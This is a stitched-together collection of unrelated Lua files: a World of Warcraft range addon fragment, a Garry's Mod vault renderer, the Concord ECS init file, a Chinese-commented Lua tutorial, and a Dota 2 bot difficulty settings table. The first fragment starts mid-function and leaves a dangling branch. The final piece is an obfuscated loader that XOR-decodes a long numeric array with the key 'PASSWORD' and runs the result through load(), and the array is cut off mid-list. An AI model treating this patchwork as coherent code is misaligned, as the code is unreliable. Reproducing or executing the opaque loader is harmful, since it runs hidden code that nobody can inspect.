local buff = UnitBuff("player", nRange_ClassInfo.buff)
if buff then
if nRange_ClassInfo.active == false then
nRange_ClassInfo.active = true;
nRange:Show();
end
return true;
else
nRange_Clear();
return false;
end
elseif class == "MONK" then
local buff = UnitBuff("player", nRange_ClassInfo.summon)
if buff then
nRange_ClassInfo.active = true;
nRange:Show();
return true;
else
nRange_Clear();
return false
end
end
end
function nRange:ADDON_LOADED(name)
if (name == "nRange") then
if nRange_Data.x == nil then
nRange_Data.x = 0;
end
if nRange_Data.y == nil then
nRange_Data.y = 0;
end
if nRange_Data.Anchor == nil then
nRange_Data.Anchor = "CENTER";
end
if nRange_Data.showicon == nil then
nRange_Data.showicon = nRange_ClassInfo.showicon;
end
if nRange_Data.active == nil then
nRange_Data.active = false;
nRange_ClassInfo.active = false;
end
if nRange_Data.communication == nil then
nRange_Data.communication = false
end
nRange_ClassInfo.showicon = nRange_Data.showicon;
nRange_Communication = nRange_Data.communication
nRange_CreateTexture();
nRange:ClearAllPoints();
nRange:SetPoint(nRange_Data.Anchor, nRange_Data.x, nRange_Data.y);
nRange:SetToplevel(true);
end
end
function nRange:PLAYER_LOGIN()
nRange:RegisterEvent("UNIT_SPELLCAST_SUCCEEDED")
nRange:RegisterEvent("PLAYER_DEAD");
nRange:RegisterEvent("ZONE_CHANGED_NEW_AREA");
nRange_SetClass();
nRange_Clear();
nRange_IsActive()
-- Check if we're murican or not
if GetLocale() ~= "enUS" then
YARDS = "meter"
end
nRange:UnregisterEvent("PLAYER_LOGIN");
end
-- Astrolabe
function nRange:MINIMAP_UPDATE_ZOOM()
local Minimap = Minimap;
local curZoom = Minimap:GetZoom();
if (GetCVar("minimapZoom") == GetCVar("minimapInsideZoom")) then
if (curZoom < 2) then
Minimap:SetZoom(curZoom + 1);
else
Minimap:SetZoom(curZoom - 1);
end
end
if ((GetCVar("minimapZoom") + 0) == Minimap:GetZoom()) then
nRange_Teleport.inside = true;
else
nRange_Teleport.inside = false;
end
Minimap:SetZoom(curZoom);
end
function PingMinimap()
Minimap:PingLocation(0,0);
local newX, newY = Minimap:GetPingPosition();
local offX = nRange_Teleport.ping.x - newX;
local offY = nRange_Teleport.ping.y - newY;
nRange_Teleport.offset.x = nRange_Teleport.offset.x + offX;
nRange_Teleport.offset.y = nRange_Teleport.offset.y + offY;
nRange_Teleport.ping.x = newX;
nRange_Teleport.ping.y = newY;
end
function nRange:UNIT_SPELLCAST_SUCCEEDED(unitID, spellName, _, _, _)
if unitID == "player" and spellName == nRange_ClassInfo.summon or (spellName == nRange_ClassInfo.teleport and class == "MONK") then
if ((nRange_ClassInfo.distance == true and nRange_ClassInfo.active == false) or (nRange_ClassInfo.distance == true and class == "MONK")) then
nRange_Teleport.facing = GetPlayerFacing();
nRange_Teleport.ping.x = 0;
nRange_Teleport.ping.y = 0;
nRange_Teleport.offset.x = 0;
nRange_Teleport.offset.y = 0;
PingMinimap();
end
nRange_ClassInfo.active, nRange_Data.active = true, true;
nRange:Show();
end
end
function nRange:PLAYER_DEAD()
nRange_Clear();
end
function nRange:ZONE_CHANGED_NEW_AREA()
if class == "MONK" then nRange_Clear();
elseif (nRange_IsActive() == false and nRange_ClassInfo.active == true) then
nRange_Clear();
end
end
function nRange_OnUpdate(self, elapsed)
nRange_TimeSinceLastUpdate = nRange_TimeSinceLastUpdate + elapsed;
if nRange_ClassInfo.active == true and nRange_ClassInfo.cooldown == true then
nRange_UpdateCooldown();
end
while (nRange_TimeSinceLastUpdate > nRange_UpdateInterval) do
if (nRange_IsActive() == true and nRange_ClassInfo.active == true) then
if (nRange_ClassInfo.distance == true) then
local x, y = Minimap:GetPingPosition()
nRange_Teleport.ping.x = x;
nRange_Teleport.ping.y = y;
local distance = nRange_Teleport.range;
nRange_GetDistance();
if (((distance - 1) >= 0) and ((distance - 1) < 1)) then
nRangeDistance:SetText(string_format("%d "..YARDS.." away", distance));
else
nRangeDistance:SetText(string_format("%d "..YARDS.."s away", distance));
end
nRange_SetDistanceColor(distance);
end
if (nRange_IconSet == false and nRange_ClassInfo.showicon) then
nRangeIconTex:SetTexture(nRange_ClassInfo.icon);
nRange_IconSet = true;
end
nRange_GetCooldown();
if (nRange_ClassInfo.cooldown == true) then
nRange_SetMessage(COOLDOWN);
elseif (nRange_InRange() == true) then
nRange_SetMessage(INRANGE);
else
nRange_SetMessage(OUTRANGE);
end
end
nRange_TimeSinceLastUpdate = nRange_TimeSinceLastUpdate - nRange_UpdateInterval;
end
end
nRange:SetScript("OnEvent", function(self, event, ...) self[event](self, ...) end);
nRange:SetScript("OnMouseDown", function(self, button)
if (nRange_ClassInfo.locked == false) then
if (button == "LeftButton" and not nRange.isMoving) then
nRange:StartMoving();
nRange.isMoving = true;
end
end
end)
nRange:SetScript("OnMouseUp", function()
if (nRange.isMoving) then
nRange:StopMovingOrSizing();
nRange.isMoving = false;
local point, relativeTo, relativePoint, xOfs, yOfs = nRange:GetPoint();
nRange_Data.x = xOfs;
nRange_Data.y = yOfs;
nRange_Data.Anchor = relativePoint;
end
end)
nRange:SetScript("OnUpdate", nRange_OnUpdate);
nRange:RegisterEvent("PLAYER_LOGIN");
nRange:RegisterEvent("ADDON_LOADED");
-- Slash commands, lol, should make this better.
SlashCmdList['NRANGE'] = function(msg)
cmd, arg1 = strsplit(" ", msg)
if (cmd == 'lock') then
nRange_Lock();
elseif (cmd == 'unlock') then
nRange_Unlock();
elseif (cmd == 'reset') then
StaticPopup_Show("RESET_NRANGE");
elseif (cmd == 'icon') then
if arg1 == 'enable' then
if (nRange_ClassInfo.showicon == true) then
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffIcons are already enabled|r");
else
nRange_ClassInfo.showicon = true;
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffIcons enabled|r");
end
elseif arg1 == 'disable' then
if (nRange_ClassInfo.showicon == false) then
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffIcons are already disabled|r");
else
nRange_ClassInfo.showicon = false;
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffIcons disabled|r");
end
else
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange icon: |cff00ffffEnable or disable|r");
end
elseif cmd == 'communication' then
if arg1 == 'enable' then
if nRange_Communication == true then
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffAddon communication is already enabled|r");
else
nRange_Communication = true;
nRange_Data.communication = true;
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffAddon communication enabled|r");
end
elseif arg1 == 'disable' then
if (nRange_Communication == false) then
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffAddon communication is already disabled|r");
else
nRange_Communication = false;
nRange_Data.communication = false;
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffAddon communication disabled|r");
end
else
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange communication: |cff00ffffEnable or disable|r");
end
else
for _, help in ipairs(nRange_Help) do
DEFAULT_CHAT_FRAME:AddMessage(help);
end
end
end
SLASH_NRANGE1 = '/nrange'
SLASH_NRANGE2 = '/nr'
else
nRange_Communication = false;
end
|
include("shared.lua")
local cachedVaults = {}
function ENT:Initialize()
self.room = ClientsideModel("models/freeman/vault/floor_safe_interior.mdl")
self.room:SetPos(self:GetPos())
self.room:SetAngles(self:GetAngles())
self.room:SetNoDraw(true)
self.room:SetBodygroup(1, 1)
cachedVaults[self:EntIndex()] = self
self.RenderGroup = 7
self.room.RenderGroup = 7
end
function ENT:Draw()
self:DrawModel()
end
function ENT:Think()
if not IsValid(self.room) then return end
self.room:SetPos(self:GetPos())
local ang = self:GetAngles()
ang:RotateAroundAxis(ang:Up(), 45)
self.room:SetAngles(ang)
end
function ENT:OnRemove()
if IsValid(self.room) then self.room:Remove() end
table.remove(cachedVaults, self:EntIndex())
end
-- huge credit to CodeBlue for helping me out with this, he's a true good guy
hook.Add("PreDrawTranslucentRenderables", "pres_stencil_floor", function(depth, skybox)
if skybox or depth then return end
for k, v in pairs(cachedVaults) do
if not IsValid(v) then continue end
local screenpos = v:GetPos():ToScreen()
if !screenpos.visible then
continue
end
render.ClearStencil()
render.SetStencilEnable(true)
render.SetStencilReferenceValue(44)
render.SetStencilWriteMask(255)
render.SetStencilTestMask(255)
render.SetStencilCompareFunction(STENCILCOMPARISONFUNCTION_ALWAYS)
render.SetStencilPassOperation(STENCILOPERATION_REPLACE)
render.SetStencilFailOperation(STENCIL_ZERO)
render.SetStencilZFailOperation(STENCIL_ZERO)
local angle = v:GetAngles()
cam.Start3D2D(v:GetPos() + (v:GetUp()*0.85), angle, 0.3)
--draw.RoundedBox(0, -75, -60, 160, 120, Color(255,255,255,255))
draw.RoundedBox(0, -60, -60, 120, 120, Color(255,255,255,1))
cam.End3D2D()
render.SetStencilCompareFunction(STENCILCOMPARISONFUNCTION_EQUAL)
render.DepthRange(0, 0.9)
if not IsValid(v.room) then
v:Initialize()
end
v.room:DrawModel()
render.SetStencilEnable(false)
render.DepthRange(0, 1)
render.ClearStencil()
end
end)
|
---
-- @module Concord
local PATH = (...):gsub('%.init$', '')
local Concord = {
_VERSION = "3.0",
_DESCRIPTION = "A feature-complete ECS library",
_LICENCE = [[
MIT LICENSE
Copyright (c) 2020 Justin van der Leij / Tjakka5
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
]]
}
Concord.entity = require(PATH..".entity")
Concord.component = require(PATH..".component")
Concord.components = require(PATH..".components")
Concord.system = require(PATH..".system")
Concord.world = require(PATH..".world")
Concord.utils = require(PATH..".utils")
return Concord
|
#!/usr/local/bin/lua
-- 这是单行注释
--[[
呐,看好了
这可是多行注释
--]]
-- table
print("table 使用示例:")
table1 = {name="Jackie",age=28,from="GD","This is a string in table",100}
for k,v in pairs(table1) do
print(k.."-" .. v)
end
-- 键为nil,则等于是被删除了
table1.name = nil
for k,v in pairs(table1) do
print(k..":"..v)
end
-- boolean
print("boolean 使用示例:")
print(type(true))
print(type(false))
print(type(nil))
if false or nil then
print("至少false和nil有一个是true")
else
print("false和nil都为false!")
end
|
-- Default settings table, returns the table, so use
-- local <x> = require 'SettingsDefault' to include in another file.
-- default settings here, override only what you change in Initialize()
local settings =
{
-- Name of the settings group (difficulty)
name = 'Standard',
-- Printed to chat when voting
description = "Bots are 1 full tier ahead on neutrals, and receive moderate death bonuses.",
-- Used to track votes of the settings
votes = 0,
-- Color in which to print to chat
color = '#00ff00',
-- Change this to select the default difficulty (chosen if
-- no one votes during difficulty voting time)
defaultDifficulty = 'standard',
-- game state in which voting should end
voteEndState = DOTA_GAMERULES_STATE_PRE_GAME,
-- voting ends when this amount of time has passed since voting began
voteEndTime = 30,
-- Warning timings for vote ending
voteWarnTimes = {10,5},
-- are multipliers multiplicative, or additive
isMultiplicative = true,
-- Taunt humans when they die with chatwheel sounds?
isPlayerDeathSound = true,
-- Set to true to enable dynamic role assignment (experimental)
isDynamicRoleAssignment = true,
-- Set to true to do annoying things to cheaters when they cheat
isEnableCheatRepurcussions = true,
-- Number of times to punish a cheater. If this is < 0, then they will be punished indefinitely
repurcussionsPerInfraction = 3,
-- this represents a multiplier to all bonuses. This allows each game to be slightly different
skill =
{
-- percentages, by role (1, 2, 3, 4, 5). A random number is chosen between the clamps
variance =
{
{1.0, 1.3},
{1.0, 1.3},
{1.0, 1.3},
{0.9, 1.3},
{0.9, 1.3}
},
-- Warns players that the bot is very strong if they are over this threshold
warningThreshold = 1.2,
-- disable warnings altogether here
isWarn = true
},
neutralItems =
{
-- duh
enabled = true,
-- Set to false to reroll on the entier table every time. True makes the awards more like real
-- jungle drops)
isRemoveUsedItems = true,
-- Max neutrals awarded per tier. You might be tempted to make this less than 5 to hinder the bots
-- a bit, but note that the award method doesn't prioritize bot roles, so you might end up with a
-- carry that doesn't have an item.
maxPerTier = {5,5,5,5,5},
-- adds this number to the awards as they come out (make this positive to give better items early
-- make it negative to cause errors, probably. If you want slower items just change the timings)
tierOffset = 0,
-- game time (seconds) at which awards are given.
timings = {0, 420, 1020, 2020, 3600},
-- variance for timings (this number of seconds added to base timing per bot)
variance = {30, 240},
-- if true, announce awards to chat
announce = true,
-- Assign randomly, or roll specific per role down the line? (former is easier)
assignRandomly = true
},
-- used for awarding bonus gold periodically. The method that does this award calculates target
-- gpm and then adds gold to the bot to attempt to force it to that level of gpm, modified by
-- the clamps.
-- exact formula: clamp( ( (targetGPM) + offset) * variance * bot.skill * scale) )
gpm =
{
-- offset is a flat offset for the target award relative to the player with the same role
offset = 0,
-- award multiplied by a random number between these values
variance = {1, 1},
-- awards are clamped to these numbers. Note that if you make the minimum non-zero, then the
-- bot's actual GPM will increase by that amount every minute (you don't want to do this)
clamp = {0, 25},
-- ignore clamps?
clampOverride = false,
-- scales (per role) for multipliers if necessary
scale = {1.2, 1.1, 1.0, 0.8, 0.6},
-- Add this to the max clamp per minute
perMinuteScale = 0.5
},
-- see gpm, same idea
xpm =
{
offset = 0,
variance = {1, 1},
clamp = {0, 25},
clampOverride = false,
scale = {1.2, 1.1, 1.0, 0.8, 0.6},
perMinuteScale = 0.5
},
deathBonus =
{
-- Order awards are given (useful when maxAwards is less than number of types)
-- this also defines the names of the types (used to index tables for other settings)
order = {'neutral', 'levels', 'stats', 'armor', 'magicResist', 'gold'},
--The maximum number of awards per death
maxAwards = 2,
-- individual bonus enables
enabled =
{
gold = true,
armor = true,
magicResist = true,
levels = true,
neutral = true,
stats = true
},
-- Further option to only enable if the bots are behind in kills
isEnabledOnlyWhenBehind =
{
gold = false,
armor = false,
magicResist = false,
levels = false,
neutral = false,
stats = false
},
-- Enabled for humans, or just bots?
isBotsOnly =
{
gold = true,
armor = true,
magicResist = true,
levels = true,
neutral = true,
stats = true
},
-- bonuses always given once this threshold is reached.
-- if this number is negative, mandatory awards are never given.
deathStreakThreshold = -1,
-- range for each award. This is the base number, which gets scaled with skill / etc.
-- clamps are applied to the scaled value
range =
{
gold = {100, 500},
armor = {1, 3},
magicResist = {1, 3},
levels = {0.5, 2},
neutral = {30, 180},
stats = {1, 3}
},
-- (Seconds) Both ends of the range multiplied by gametime / this value.
-- Adjust this to prevent large awards early. Note that clamp has its
-- own scaling, so you can, for example, grow quickly but still
-- clamp late.
-- If this is enabled and no default numbers changed, it should
-- prevent early game OH SHIT moments, or provide late game OH SHIT moments.
-- Default scales to nominal range at 30 minutes (and more beyond)
rangeTimeScale =
{
gold = 1800,
armor = 1800,
magicResist = 1800,
levels = 1800,
neutral = 1800,
stats = 1800
},
isRangeTimeScaleEnable = false,
-- bonus clamps. Awards given are clamped between these values
clamp =
{
gold = {100, 1500},
armor = {1, 3},
magicResist = {1, 3},
levels = {0.5, 2},
neutral = {30, 180},
stats = {1, 3}
},
-- if override is true, then the clamps aren't applied
clampOverride =
{
gold = false,
armor = false,
magicResist = false,
levels = false,
neutral = false,
stats = false
},
-- (Seconds) Upper clamp end scaled by this value.
-- Note the lower clamp is never adjusted.
-- Adjust this to allow even greater late game OH SHIT moments.
-- Default scales to nominal range at 30 minutes (and more beyond)
clampTimeScale =
{
gold = 1800,
armor = 1800,
magicResist = 1800,
levels = 1800,
neutral = 1800,
stats = 1800
},
isClampTimeScaleEnable = false,
-- chances per indivdual award. current levels tracked in bot.stats.chance
chance =
{
gold = 0.15,
armor = 0.05,
magicResist = 0.05,
levels = 0.10,
neutral = 0.10,
stats = 0.05
},
-- if accrue is true, chances accumulate per death
accrue =
{
gold = true,
armor = true,
magicResist = true,
levels = false,
neutral = false,
stats = true
},
-- flat offsets for bonus per type
offset =
{
gold = 0,
armor = 0,
magicResist = 0,
levels = 0,
neutral = 0,
stats = 0
},
-- Awards are rounded to this many decimal places after scaling
round =
{
gold = 0,
armor = 2,
magicResist = 2,
levels = 2,
neutral = 0,
stats = 0,
},
-- variance per type
variance =
{
gold = {0.8, 1.2},
armor = {0.8, 1.2},
magicResist = {0.8, 1.2},
levels = {0.8, 1.2},
neutral = {0.8, 1.2},
stats = {0.8, 1.2}
},
-- is this award always loud?
isLoud =
{
gold = false,
armor = false,
magicResist = false,
levels = true,
neutral = true,
stats = false
},
-- is this award loud if it gets clamped on the high side?
isClampLoud =
{
gold = true,
armor = false,
magicResist = false,
levels = false,
neutral = false,
stats = false
},
-- Awards multiplied by this (per role) if enabled
scale =
{
gold = {1.2, 1.1, 1.0, 0.8, 0.6},
armor = {1.2, 1.1, 1.0, 0.4, 0.2},
magicResist = {1.2, 1.1, 1.0, 0.4, 0.2},
levels = {1.2, 1.1, 1.0, 0.8, 0.6},
neutral = {1.2, 1.1, 1.0, 0.8, 0.6},
stats = {1.2, 1.1, 1.0, 0.8, 0.6}
},
-- Enable role scaling?
scaleEnabled =
{
gold = true,
armor = true,
magicResist = true,
levels = true,
neutral = true,
stats = true
},
-- bonuses not awarded if game time is less than this number (seconds)
timeGate =
{
gold = -100,
armor = -100,
magicResist = -100,
levels = 120,
neutral = -100,
stats = -100,
},
-- sets whether to announce in chat if awards have been given
announce = true
},
-- One Time awards (granted at game start)
-- note that neutral is not the count, it is the tier
-- still, it's probably better to just fix neutral timing rather than award one here
gameStartBonus =
{
gold = 0,
armor = 0,
magicResist = 0,
levels = 0,
neutral = 0,
stats = 0
},
-- caps for awards per game
awardCap =
{
gold = 25000,
armor = 25,
magicResist = 25,
levels = 10,
neutral = 1200,
stats = 25,
},
-- Settings for dynamically adjusting difficulty
dynamicDifficulty =
{
-- Set to false to disable completely.
enabled = true,
-- 'knobs' to turn to adjust difficulty dynamically.
knobs =
{
'gpm',
'xpm',
'levels',
'stats'
},
-- Settings related to kill deficits
gpm =
{
-- Set to false to disable adjustments based on kills.
enabled = true,
-- if the bots are this many kills behind, begin adjusting
advantageThreshold = 2,
-- Awards scaled by scale amount every <this many> kills beyond the threshold
incrementEvery = 1,
-- base bonus increased by this much when over threshold
base = 20,
-- incremental amounts are added to the base every time
-- the increment amount is reached, i.e. if threshold is 5,
-- incrementEvery is 2, and the bots are 9 kills behind,
-- then the nudge will be base + (increment * 2)
increment = 10,
-- maximum for this bonus
cap = 200,
-- If true, adjustments are announced to chat.
announce = false
},
xpm =
{
enabled = false,
advantageThreshold = 2,
incrementEvery = 1,
base = 10,
increment = 5,
cap = 200,
announce = false
},
levels =
{
enabled = false,
advantageThreshold = 10,
incrementEvery = 2,
base = 1,
increment = 1,
cap = 3,
announce = false,
-- chanceAdjust is optional and will adjust the base chance for
-- death awards for each knob.
chanceAdjust =
{
enabled = true,
advantageThreshold = 10,
incrementEvery = 0,
base = 1.0,
increment = 0,
cap = 1,
announce = false,
}
},
stats =
{
enabled = true,
advantageThreshold = 7,
incrementEvery = 2,
base = 1,
increment = 1,
cap = 5,
announce = false,
-- chanceAdjust is optional and will adjust the base chance for
-- death awards for each knob.
chanceAdjust =
{
enabled = true,
advantageThreshold = 7,
incrementEvery = 0,
base = 0.5,
increment = 0,
cap = 1,
announce = false,
}
},
},
-- Settings for hero specific stuff (i.e. experimental LD bear item moving)
heroSpecific =
{
loneDruid =
{
enabled = false
}
}
}
return settings |
key="PASSWORD"local a=load((function(b,c)function bxor(d,e)local f={{0,1},{1,0}}local g=1;local h=0;while d>0 or e>0 do h=h+f[d%2+1][e%2+1]*g;d=math.floor(d/2)e=math.floor(e/2)g=g*2 end;return h end;local i=function(b)local j={}local k=1;local l=b[k]while l>=0 do j[k]=b[l+1]k=k+1;l=b[k]end;return j end;local m=function(b,c)if#c<=0 then return{}end;local k=1;local n=1;for k=1,#b do b[k]=bxor(b[k],string.byte(c,n))n=n+1;if n>#c then n=1 end end;return b end;local o=function(b)local j=""for k=1,#b do j=j..string.char(b[k])end;return j end;return o(m(i(b),c))end)({6851,4643,6774,4547,7656,5356,5116,6574,7529,5390,7750,4824,5080,6333,4136,7269,7103,7337,4577,6915,4423,7439,6669,7465,6898,6518,4065,6821,7090,5745,5170,4245,4901,4540,5255,4721,5054,4062,4555,6346,7982,5296,8036,6838,5660,5432,7959,4160,5603,7282,4703,4825,5347,6515,5930,6667,5527,7940,7032,6449,4575,7186,4726,5607,5669,5413,6045,6406,4342,5350,6100,7361,6088,5397,7814,7539,5637,5625,6078,6195,7432,7236,7401,4847,5003,4282,5368,5812,5378,5004,4560,4839,6404,4042,5237,7632,8017,5650,4015,6729,5898,4119,7411,7687,5099,6271,8056,6107,5063,5261,5109,5918,6368,8002,3985,5574,4218,7978,6831,7971,4034,4066,7884,5294,4114,7499,6035,5802,4152,4794,5172,5729,5064,5562,5966,5857,4788,7381,7441,7869,6617,6252,5369,4591,7424,4711,6578,5564,6012,4375,5538,4401,5446,4406,4900,5524,7725,7329,4302,6044,4318,6327,7864,8041,6581,5463,5254,4488,6714,6868,5111,5484,6448,4542,4885,7862,8057,5868,6274,4751,7376,5889,6799,5272,5337,6213,5788,7419,5513,7553,5344,5969,6985,6755,7516,7156,7113,7700,7976,4505,6905,4311,4159,7390,6363,7573,5189,7647,6531,6873,6069,7467,6191,4440,7913,5284,5775,7434,7170,6361,6402,7717,7820,3997,6070,6628,7341,4090,7476,4230,8063,7649,4582,4509,4191,4091,4937,5460,6589,7702,4988,7220,4274,4846,5727,5292,6621,4037,5297,5880,7362,7617,5869,6877,4864,7119,5719,4646,7057,4243,7801,6329,5922,7219,6661,7991,6046,4593,7917,5187,6001,5338,6478,6345,6700,7533,5467,7177,6159,6309,7475,7961,5400,7153,6150,4723,5683,6447,4442,4093,8047,7985,6567,7243,5822,6582,4611,6208,4077,6635,5547,4634,7162,7059,6135,6398,6054,4323,7568,6066,7266,5793,6435,5731,4793,4929,5340,6867,7686,4511,4386,4051,7239,7636,6144,6400,4098,5905,7968,6625,7645,4221,7631,5612,7450,4211,4014,6887,7175,6651,6968,7312,4157,5568,5913,4574,6690,8060,6990,6980,4882,7190,5874,6627,6015,5997,6914,7630,4812,6947,6412,6805,6117,7203,6415,4630,7859,4300,4713,6105,7405,4595,8024,5035,6521,4836,4018,6098,5391,7972,4271,4177,5123,6017,6053,6397,6579,4070,5847,4483,6217,4128,7962,7079,4961,6723,6612,5517,4373,5522,4813,5658,5929,5326,5548,6204,7826,6517,7110,5850,5896,5981,3988,7992,4026,4866,7870,3976,6749,4105,6411,7427,5200,5258,7007,5572,6158,4853,7126,4400,4142,4666,5012,7680,5507,7719,7240,6784,4220,5780,7442,7851,7392,6301,5978,7094,6228,7825,4144,4134,6413,4044,5806,6812,4123,4253,5091,4255,5367,6631,5138,6695,5166,5779,4801,6171,4107,5497,7949,5046,5325,7637,5856,4541,5086,4668,7806,6238,4834,5533,7148,5152,6281,5685,7555,6779,4277,7410,5489,6509,7742,5119,5492,7347,5542,5065,7697,5158,6343,5671,5590,7088,4620,4117,6250,7941,4899,6450,5740,7497,5331,5923,7611,7130,5195,6052,6152,7933,6011,7735,6536,4513,4198,5226,6362,5194,5285,4624,6966,6254,7151,5496,6893,4480,4603,6466,4292,7975,7003,5300,5667,5380,5758,7525,4740,7779,7785,5209,7797,6033,6777,4696,5525,6444,6842,6529,4355,5610,4251,8028,4059,4852,5708,6013,7931,7308,6007,4908,7896,7430,4494,4916,7796,4147,7840,6597,7470,7180,7053,5283,6453,6123,7462,6814,5483,5747,7227,4754,7214,4448,7135,7756,4040,4910,6662,5886,4099,6097,5728,7356,6335,7416,7421,5192,6186,7613,4158,6108,5714,6938,6255,4489,6763,5596,7343,5842,7311,4832,4192,7714,5945,7108,5071,5216,6510,4957,7726,4746,5070,7503,6971,7942,4353,6575,6149,7367,7997,4078,4405,4272,4013,7364,7139,7425,4520,6055,4880,6482,5087,5447,7681,6139,7945,6034,6350,5640,5558,4150,7768,3975,4872,6534,6036,7229,7958,4638,6580,4722,4918,4945,6436,6292,4776,5835,5164,4954,4313,5798,7082,7793,5208,5838,5048,4980,7433,7134,4437,6090,5185,5893,6426,7288,7294,6212,4185,4748,6888,7685,4639,7541,4231,7065,6941,4938,4770,7091,4873,5353,6073,6931,4970,6566,6476,5223,7496,8053,7688,4028,5491,7013,4662,7245,7296,5846,4972,6689,6920,4717,5882,5638,4897,6623,7172,7092,6526,7872,6075,5813,7334,5376,7764,6389,5308,4893,7027,7900,5092,7368,5601,7618,7157,7755,7494,5293,7576,4963,6337,7595,3982,5963,6707,4258,6223,6818,5825,4145,7107,4460,6141,4503,4005,5478,5987,7428,7720,4576,6037,7023,6965,8029,6085,5906,7291,7278,5756,7042,6234,6296,6232,6660,7893,4848,4194,6506,7777,5989,6372,6998,7934,4106,5128,7926,5419,5108,7790,5000,6946,4789,4698,7358,5381,6277,6798,5480,4110,6270,6796,8069,4648,7838,5680,4381,5243,4165,5213,4528,4693,7947,7563,5627,6956,4546,7998,4617,4588,4169,7489,5270,4765,6912,6687,4516,4043,4960,5149,4707,6057,4817,6619,6460,4338,5645,6813,6782,6899,5464,7366,4133,5486,4827,4655,4443,6243,4415,6989,4268,6688,7242,4940,7609,7391,5672,4446,5903,7287,7583,7350,7279,8005,5557,6283,7741,4745,4955,4321,6142,5619,7174,5175,5694,7415,6743,6140,5364,7189,6808,6295,6475,4888,5439,8068,7309,5553,5531,7754,6856,4951,7963,7035,7468,6781,6101,7068,7924,6767,4806,6246,7154,6997,6815,5948,6196,7185,4561,6524,4585,6916,6379,7508,6222,7010,6177,4239,6119,4358,4470,7481,4549,3979,4844,4926,7782,8039,6556,5236,5759,7598,7036,7194,4500,4011,5088,7920,6608,5699,4514,7757,5001,5262,4164,4346,4978,4247,3974,4953,4414,6626,6306,4330,6594,5890,4041,6532,8062,5329,5327,5132,6206,7798,6451,4006,8066,4823,7037,4783,7856,6701,5334,6493,6472,6227,5718,4656,4279,4731,4679,4187,5565,4724,6257,7223,4382,7461,6316,6870,4784,5241,5836,4248,7479,6050,6528,5079,7399,4176,7996,6137,6537,7117,7473,6503,7187,6146,4625,7232,4033,4096,6039,6237,7984,5710,7050,5096,5477,5746,5532,3980,8055,7805,7264,5950,4818,6091,4796,6331,7678,6530,6109,4959,5829,7285,6205,4594,6514,7646,4101,5030,6512,6328,5018,6326,7954,8046,7178,7176,4777,6302,4467,7633,6698,7293,4981,6064,7355,5355,7265,7195,4377,6633,5980,4327,5073,6215,6840,5725,6235,5095,8059,5545,7559,7850,6958,7873,7116,7521,4436,7694,4613,6823,6290,7517,7526,4608,4356,7495,4195,7955,5407,6593,6974,7956,4094,4924,5025,5442,7672,6819,6901,3978,7123,5761,7743,5751,4999,4956,7471,7446,7047,7786,5259,5428,5715,4537,5844,6871,5872,5697,5231,4607,4259,6644,4222,4462,4439,4752,4372,7582,7118,6975,4463,5827,6266,6756,5332,7033,5501,6494,6030,6810,4510,6802,4102,4294,5014,8019,5113,6242,6825,4554,7235,7911,4217,7290,5434,4076,7226,4667,6122,4606,7683,4124,4719,4317,6830,7058,7233,7807,5959,7502,6172,6416,3984,7740,5985,6991,5256,6145,6922,8064,6590,6892,4045,6878,8052,7860,5269,6162,7928,4067,6740,6569,5257,4270,4411,6605,5222,5875,8035,4081,5047,5115,4433,7078,6325,5664,7759,6546,4566,6962,4348,5804,5242,5639,5343,5586,5268,4126,4212,4168,7784,5765,7783,6401,4932,5143,6558,7382,4267,5912,7299,5042,7081,5455,5782,6425,6610,4529,6315,8034,5412,7351,7608,4263,4109,5500,6712,5386,7532,4747,5043,4475,5416,6280,7908,4326,7040,5614,7327,7246,6279,7206,8023,5078,7817,6502,4421,5910,5410,4306,6996,5763,7106,5504,4428,7562,7020,7009,4822,6201,5774,6642,4660,5633,7604,7901,6607,5602,6051,4771,7370,4301,5866,6982,4651,8007,6744,7816,4879,4197,5624,4427,6431,5274,6752,4532,4378,5062,6634,5648,7005,6839,6118,7812,4199,7149,7237,5202,6479,6918,7166,6713,7662,5245,4567,6419,5932,5451,3993,6321,6917,6127,4118,4186,6351,4441,6970,6816,7161,6047,6725,4965,6727,5323,6065,7318,7431,5845,4756,6876,4835,7280,7083,4669,6535,6049,6788,4236,6248,5389,4782,5056,5968,7454,3981,6081,7181,6680,7478,5433,4113,6452,4397,5482,6003,5470,5668,5689,7213,7659,5773,6259,4048,6284,4361,7641,6601,4697,4750,6993,6890,5939,4299,7732,6952,7787,7769,5093,6023,7855,5180,4663,4073,6187,7935,5418,7244,4863,4179,4664,7268,7874,7196,4715,5127,7887,4996,6348,4946,7034,6720,7485,5190,7761,5897,7586,7601,5560,6933,6711,8011,5396,7890,7025,7682,5450,6622,7842,4343,7599,6040,5712,5210,6748,7273,7457,5233,5787,6505,6883,5246,5849,7158,5720,6742,5892,4843,5191,4304,6286,4502,7274,5201,4925,5435,5219,7677,6093,5867,3983,4083,6896,6116,6857,4944,5339,5807,7738,7723,6256,4278,7789,5097,6299,4496,7577,5505,7766,4819,5754,6766,7580,5306,5288,7753,7466,6751,7127,6048,5960,6861,7140,